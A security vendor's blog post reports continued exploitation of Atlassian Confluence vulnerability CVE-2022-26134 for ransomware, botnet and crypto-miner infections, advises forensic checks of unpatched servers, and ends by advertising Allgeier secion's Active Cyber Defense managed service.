Atlassian Confluence vulnerability continues to be actively exploited!
by Tina Siering
The critical vulnerability (CVE-2022-26134, CVSS score: 9.8) in Atlassian Confluence Server and Data Center products patched in early June continues to be actively exploited for ransomware attacks: In at least two incidents, attackers exploited the vulnerability to spread malicious malicious code (e.g., Cerber ransomware, Cobalt Strike via web shell, Mirai and Kinsing bot variants, and a crypto miner called z0miner).
If the necessary patch has not yet been applied, it is highly likely that systems have now been compromised and should be investigated forensically accordingly.
But there is also danger from supposedly closed security holes: once attackers have successfully installed a cryptominer, it will continue to do its job even after the system is patched. The same applies to successful infiltration using malicious code.
Our Allgeier secion customers with an active managed service contract for ACD are of course informed about malicious communication on their systems; for example, we are currently actively checking for Confluence IoCs.
Conclusion
So time is and will remain a critical factor in detecting and eliminating cyber threats like ransomware.
We show you that you no longer need a SOC, SIEM or forensics: with Active Cyber Defense (ACD) service, you will know 24/7 if attack activity is taking place on your network, immediately after a system has been compromised.
ACD relieves your IT security team and can be booked as a managed service at a fixed monthly price.